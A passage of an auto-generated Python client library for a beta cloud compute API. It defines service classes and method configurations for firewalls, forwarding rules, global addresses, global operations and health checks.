    super(ComputeBeta.FirewallsService, self).__init__(client)
    # No media-upload configurations are defined for this service.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified firewall.

    Args:
      request: (ComputeFirewallsDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Delete: DELETE on a single firewall rule.
  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.firewalls.delete',
      ordered_params=[u'project', u'firewall'],
      path_params=[u'firewall', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/firewalls/{firewall}',
      request_field='',
      request_type_name=u'ComputeFirewallsDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified firewall.

    Args:
      request: (ComputeFirewallsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Firewall) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Get: GET of a single firewall rule.
  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.firewalls.get',
      ordered_params=[u'project', u'firewall'],
      path_params=[u'firewall', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/firewalls/{firewall}',
      request_field='',
      request_type_name=u'ComputeFirewallsGetRequest',
      response_type_name=u'Firewall',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a firewall rule in the specified project using the data included in the request.

    Args:
      request: (ComputeFirewallsInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Insert: POST, body carried by firewall.
  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.firewalls.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/firewalls',
      request_field=u'firewall',
      request_type_name=u'ComputeFirewallsInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of firewall rules available to the specified project.

    Args:
      request: (ComputeFirewallsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (FirewallList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for List: paginated GET, no request body.
  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.firewalls.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/firewalls',
      request_field='',
      request_type_name=u'ComputeFirewallsListRequest',
      response_type_name=u'FirewallList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Updates the specified firewall rule with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

    Args:
      request: (ComputeFirewallsPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Patch')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Patch: partial update, body carried by
  # firewallResource.
  Patch.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PATCH',
      method_id=u'compute.firewalls.patch',
      ordered_params=[u'project', u'firewall'],
      path_params=[u'firewall', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/firewalls/{firewall}',
      request_field=u'firewallResource',
      request_type_name=u'ComputeFirewallsPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeFirewallsTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for TestIamPermissions: POST, body carried by
  # testPermissionsRequest.
  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.firewalls.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/firewalls/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeFirewallsTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )

  def Update(self, request, global_params=None):
    """Updates the specified firewall rule with the data included in the request. The PUT method can only update the following fields of firewall rule: allowed, description, sourceRanges, sourceTags, targetTags.

    Args:
      request: (ComputeFirewallsUpdateRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Update')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Update: PUT, body carried by firewallResource.
  Update.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PUT',
      method_id=u'compute.firewalls.update',
      ordered_params=[u'project', u'firewall'],
      path_params=[u'firewall', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/firewalls/{firewall}',
      request_field=u'firewallResource',
      request_type_name=u'ComputeFirewallsUpdateRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class ForwardingRulesService(base_api.BaseApiService):
    """Service wrapping the forwardingRules API resource."""

    _NAME = u'forwardingRules'

    def __init__(self, client):
        super(ComputeBeta.ForwardingRulesService, self).__init__(client)
        # This service declares no media-upload endpoints.
        self._upload_configs = {}

    def AggregatedList(self, request, global_params=None):
        """Retrieve an aggregated list of forwarding rules.

        Args:
            request: (ComputeForwardingRulesAggregatedListRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (ForwardingRuleAggregatedList) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('AggregatedList'), request,
            global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.forwardingRules.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/forwardingRules',
        request_field='',
        request_type_name=u'ComputeForwardingRulesAggregatedListRequest',
        response_type_name=u'ForwardingRuleAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Delete the specified ForwardingRule resource.

        Args:
            request: (ComputeForwardingRulesDeleteRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.forwardingRules.delete',
        ordered_params=[u'project', u'region', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project', u'region'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}',
        request_field='',
        request_type_name=u'ComputeForwardingRulesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Return the specified ForwardingRule resource.

        Args:
            request: (ComputeForwardingRulesGetRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (ForwardingRule) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.forwardingRules.get',
        ordered_params=[u'project', u'region', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}',
        request_field='',
        request_type_name=u'ComputeForwardingRulesGetRequest',
        response_type_name=u'ForwardingRule',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Create a ForwardingRule resource in the given project and region from the data carried in the request.

        Args:
            request: (ComputeForwardingRulesInsertRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.forwardingRules.insert',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules',
        request_field=u'forwardingRule',
        request_type_name=u'ComputeForwardingRulesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieve the ForwardingRule resources available to the given project and region.

        Args:
            request: (ComputeForwardingRulesListRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (ForwardingRuleList) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.forwardingRules.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules',
        request_field='',
        request_type_name=u'ComputeForwardingRulesListRequest',
        response_type_name=u'ForwardingRuleList',
        supports_download=False,
    )

    def SetLabels(self, request, global_params=None):
        """Set the labels on the specified resource. See the Labeling Resources documentation to learn more about labels.

        Args:
            request: (ComputeForwardingRulesSetLabelsRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetLabels'), request,
            global_params=global_params)

    SetLabels.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.forwardingRules.setLabels',
        ordered_params=[u'project', u'region', u'resource'],
        path_params=[u'project', u'region', u'resource'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules/{resource}/setLabels',
        request_field=u'regionSetLabelsRequest',
        request_type_name=u'ComputeForwardingRulesSetLabelsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetTarget(self, request, global_params=None):
        """Change the target URL of a forwarding rule; the new target must be of the same type as the old one.

        Args:
            request: (ComputeForwardingRulesSetTargetRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetTarget'), request,
            global_params=global_params)

    SetTarget.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.forwardingRules.setTarget',
        ordered_params=[u'project', u'region', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project', u'region'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}/setTarget',
        request_field=u'targetReference',
        request_type_name=u'ComputeForwardingRulesSetTargetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def TestIamPermissions(self, request, global_params=None):
        """Return the permissions that the caller holds on the specified resource.

        Args:
            request: (ComputeForwardingRulesTestIamPermissionsRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (TestPermissionsResponse) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('TestIamPermissions'), request,
            global_params=global_params)

    TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.forwardingRules.testIamPermissions',
        ordered_params=[u'project', u'region', u'resource'],
        path_params=[u'project', u'region', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules/{resource}/testIamPermissions',
        request_field=u'testPermissionsRequest',
        request_type_name=u'ComputeForwardingRulesTestIamPermissionsRequest',
        response_type_name=u'TestPermissionsResponse',
        supports_download=False,
    )
class GlobalAddressesService(base_api.BaseApiService):
    """Service wrapping the globalAddresses API resource."""

    _NAME = u'globalAddresses'

    def __init__(self, client):
        super(ComputeBeta.GlobalAddressesService, self).__init__(client)
        # This service declares no media-upload endpoints.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Delete the specified address resource.

        Args:
            request: (ComputeGlobalAddressesDeleteRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.globalAddresses.delete',
        ordered_params=[u'project', u'address'],
        path_params=[u'address', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/addresses/{address}',
        request_field='',
        request_type_name=u'ComputeGlobalAddressesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Return the specified address resource. A list of available addresses can be obtained with a list() request.

        Args:
            request: (ComputeGlobalAddressesGetRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Address) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.globalAddresses.get',
        ordered_params=[u'project', u'address'],
        path_params=[u'address', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/addresses/{address}',
        request_field='',
        request_type_name=u'ComputeGlobalAddressesGetRequest',
        response_type_name=u'Address',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Create an address resource in the given project from the data carried in the request.

        Args:
            request: (ComputeGlobalAddressesInsertRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.globalAddresses.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/addresses',
        request_field=u'address',
        request_type_name=u'ComputeGlobalAddressesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieve the list of global addresses.

        Args:
            request: (ComputeGlobalAddressesListRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (AddressList) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.globalAddresses.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/addresses',
        request_field='',
        request_type_name=u'ComputeGlobalAddressesListRequest',
        response_type_name=u'AddressList',
        supports_download=False,
    )

    def SetLabels(self, request, global_params=None):
        """Set the labels on a GlobalAddress. See the Labeling Resources documentation to learn more about labels.

        Args:
            request: (ComputeGlobalAddressesSetLabelsRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetLabels'), request,
            global_params=global_params)

    SetLabels.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.globalAddresses.setLabels',
        ordered_params=[u'project', u'resource'],
        path_params=[u'project', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/global/addresses/{resource}/setLabels',
        request_field=u'globalSetLabelsRequest',
        request_type_name=u'ComputeGlobalAddressesSetLabelsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def TestIamPermissions(self, request, global_params=None):
        """Return the permissions that the caller holds on the specified resource.

        Args:
            request: (ComputeGlobalAddressesTestIamPermissionsRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (TestPermissionsResponse) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('TestIamPermissions'), request,
            global_params=global_params)

    TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.globalAddresses.testIamPermissions',
        ordered_params=[u'project', u'resource'],
        path_params=[u'project', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/global/addresses/{resource}/testIamPermissions',
        request_field=u'testPermissionsRequest',
        request_type_name=u'ComputeGlobalAddressesTestIamPermissionsRequest',
        response_type_name=u'TestPermissionsResponse',
        supports_download=False,
    )
class GlobalForwardingRulesService(base_api.BaseApiService):
    """Service wrapping the globalForwardingRules API resource."""

    _NAME = u'globalForwardingRules'

    def __init__(self, client):
        super(ComputeBeta.GlobalForwardingRulesService, self).__init__(client)
        # This service declares no media-upload endpoints.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Delete the specified GlobalForwardingRule resource.

        Args:
            request: (ComputeGlobalForwardingRulesDeleteRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.globalForwardingRules.delete',
        ordered_params=[u'project', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}',
        request_field='',
        request_type_name=u'ComputeGlobalForwardingRulesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Return the specified GlobalForwardingRule resource. A list of available forwarding rules can be obtained with a list() request.

        Args:
            request: (ComputeGlobalForwardingRulesGetRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (ForwardingRule) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.globalForwardingRules.get',
        ordered_params=[u'project', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}',
        request_field='',
        request_type_name=u'ComputeGlobalForwardingRulesGetRequest',
        response_type_name=u'ForwardingRule',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Create a GlobalForwardingRule resource in the given project from the data carried in the request.

        Args:
            request: (ComputeGlobalForwardingRulesInsertRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.globalForwardingRules.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/forwardingRules',
        request_field=u'forwardingRule',
        request_type_name=u'ComputeGlobalForwardingRulesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieve the GlobalForwardingRule resources available to the given project.

        Args:
            request: (ComputeGlobalForwardingRulesListRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (ForwardingRuleList) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.globalForwardingRules.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/forwardingRules',
        request_field='',
        request_type_name=u'ComputeGlobalForwardingRulesListRequest',
        response_type_name=u'ForwardingRuleList',
        supports_download=False,
    )

    def SetLabels(self, request, global_params=None):
        """Set the labels on the specified resource. See the Labeling Resources documentation to learn more about labels.

        Args:
            request: (ComputeGlobalForwardingRulesSetLabelsRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetLabels'), request,
            global_params=global_params)

    SetLabels.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.globalForwardingRules.setLabels',
        ordered_params=[u'project', u'resource'],
        path_params=[u'project', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/global/forwardingRules/{resource}/setLabels',
        request_field=u'globalSetLabelsRequest',
        request_type_name=u'ComputeGlobalForwardingRulesSetLabelsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetTarget(self, request, global_params=None):
        """Change the target URL of the GlobalForwardingRule resource; the new target must be of the same type as the old one.

        Args:
            request: (ComputeGlobalForwardingRulesSetTargetRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetTarget'), request,
            global_params=global_params)

    SetTarget.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.globalForwardingRules.setTarget',
        ordered_params=[u'project', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}/setTarget',
        request_field=u'targetReference',
        request_type_name=u'ComputeGlobalForwardingRulesSetTargetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def TestIamPermissions(self, request, global_params=None):
        """Return the permissions that the caller holds on the specified resource.

        Args:
            request: (ComputeGlobalForwardingRulesTestIamPermissionsRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (TestPermissionsResponse) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('TestIamPermissions'), request,
            global_params=global_params)

    TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.globalForwardingRules.testIamPermissions',
        ordered_params=[u'project', u'resource'],
        path_params=[u'project', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/global/forwardingRules/{resource}/testIamPermissions',
        request_field=u'testPermissionsRequest',
        request_type_name=u'ComputeGlobalForwardingRulesTestIamPermissionsRequest',
        response_type_name=u'TestPermissionsResponse',
        supports_download=False,
    )
class GlobalOperationsService(base_api.BaseApiService):
    """Service wrapping the globalOperations API resource."""

    _NAME = u'globalOperations'

    def __init__(self, client):
        super(ComputeBeta.GlobalOperationsService, self).__init__(client)
        # This service declares no media-upload endpoints.
        self._upload_configs = {}

    def AggregatedList(self, request, global_params=None):
        """Retrieve an aggregated list of all operations.

        Args:
            request: (ComputeGlobalOperationsAggregatedListRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (OperationAggregatedList) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('AggregatedList'), request,
            global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.globalOperations.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/operations',
        request_field='',
        request_type_name=u'ComputeGlobalOperationsAggregatedListRequest',
        response_type_name=u'OperationAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Delete the specified Operations resource.

        Args:
            request: (ComputeGlobalOperationsDeleteRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (ComputeGlobalOperationsDeleteResponse) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.globalOperations.delete',
        ordered_params=[u'project', u'operation'],
        path_params=[u'operation', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/operations/{operation}',
        request_field='',
        request_type_name=u'ComputeGlobalOperationsDeleteRequest',
        response_type_name=u'ComputeGlobalOperationsDeleteResponse',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Retrieve the specified Operations resource. A list of operations can be obtained with a list() request.

        Args:
            request: (ComputeGlobalOperationsGetRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.globalOperations.get',
        ordered_params=[u'project', u'operation'],
        path_params=[u'operation', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/operations/{operation}',
        request_field='',
        request_type_name=u'ComputeGlobalOperationsGetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieve the Operation resources contained within the given project.

        Args:
            request: (ComputeGlobalOperationsListRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (OperationList) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.globalOperations.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/operations',
        request_field='',
        request_type_name=u'ComputeGlobalOperationsListRequest',
        response_type_name=u'OperationList',
        supports_download=False,
    )
class HealthChecksService(base_api.BaseApiService):
    """Service wrapping the healthChecks API resource."""

    _NAME = u'healthChecks'

    def __init__(self, client):
        super(ComputeBeta.HealthChecksService, self).__init__(client)
        # This service declares no media-upload endpoints.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Delete the specified HealthCheck resource.

        Args:
            request: (ComputeHealthChecksDeleteRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.healthChecks.delete',
        ordered_params=[u'project', u'healthCheck'],
        path_params=[u'healthCheck', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
        request_field='',
        request_type_name=u'ComputeHealthChecksDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Return the specified HealthCheck resource. A list of available health checks can be obtained with a list() request.

        Args:
            request: (ComputeHealthChecksGetRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (HealthCheck) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.healthChecks.get',
        ordered_params=[u'project', u'healthCheck'],
        path_params=[u'healthCheck', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
        request_field='',
        request_type_name=u'ComputeHealthChecksGetRequest',
        response_type_name=u'HealthCheck',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Create a HealthCheck resource in the given project from the data carried in the request.

        Args:
            request: (ComputeHealthChecksInsertRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.healthChecks.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/healthChecks',
        request_field=u'healthCheck',
        request_type_name=u'ComputeHealthChecksInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieve the HealthCheck resources available to the given project.

        Args:
            request: (ComputeHealthChecksListRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (HealthCheckList) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.healthChecks.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/healthChecks',
        request_field='',
        request_type_name=u'ComputeHealthChecksListRequest',
        response_type_name=u'HealthCheckList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
        """Update a HealthCheck resource in the given project from the data carried in the request. Supports PATCH semantics and uses the JSON merge patch format and processing rules.

        Args:
            request: (ComputeHealthChecksPatchRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Patch'), request,
            global_params=global_params)

    Patch.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PATCH',
        method_id=u'compute.healthChecks.patch',
        ordered_params=[u'project', u'healthCheck'],
        path_params=[u'healthCheck', u'project'],
        query_params=[u'requestId'],
